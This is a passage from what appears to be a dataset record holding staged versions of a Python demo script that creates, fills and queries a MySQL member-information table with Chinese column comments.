'营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\ndef selectTable(db):\n cur1 = db.cursor()\n cur1.execute(\n 'select member_name,MEMBER_CODE,member_id from python_demo limit 10')\n data = cur1.fetchall()\n for index, item in enumerate(data):\n print(index, sep=' ', end=' ')\n for index2, item2 in enumerate(item):\n print(item2, sep=' ', end=' ')\n print('')\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\ndef selectTable(db):\n cur1 = db.cursor()\n cur1.execute(\n 'select member_name,MEMBER_CODE,member_id from python_demo limit 10')\n data = cur1.fetchall()\n for index, item in enumerate(data):\n print(index, sep=' ', end=' ')\n for index2, item2 in enumerate(item):\n print(item2, sep=' ', end=' ')\n print('')\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\n<mask token>\ndropTable(db)\ncreateTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ntesteSelect(db)\nselectTable(db)\ndb.close()\n",
"step-4": "<mask token>\n\n\ndef testeSelect(db):\n cur1 = db.cursor()\n cur1.execute('SELECT VERSION()')\n data = cur1.fetchone()\n print(dir(data))\n print('cur1 : %s ' % cur1)\n print('Database version : %s ' % data)\n\n\ndef dropTable(db):\n cur1 = db.cursor()\n cur1.execute('drop table if exists python_demo')\n print('dropTable', cur1)\n\n\ndef createTable(db):\n cur1 = db.cursor()\n sql = \"\"\"\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 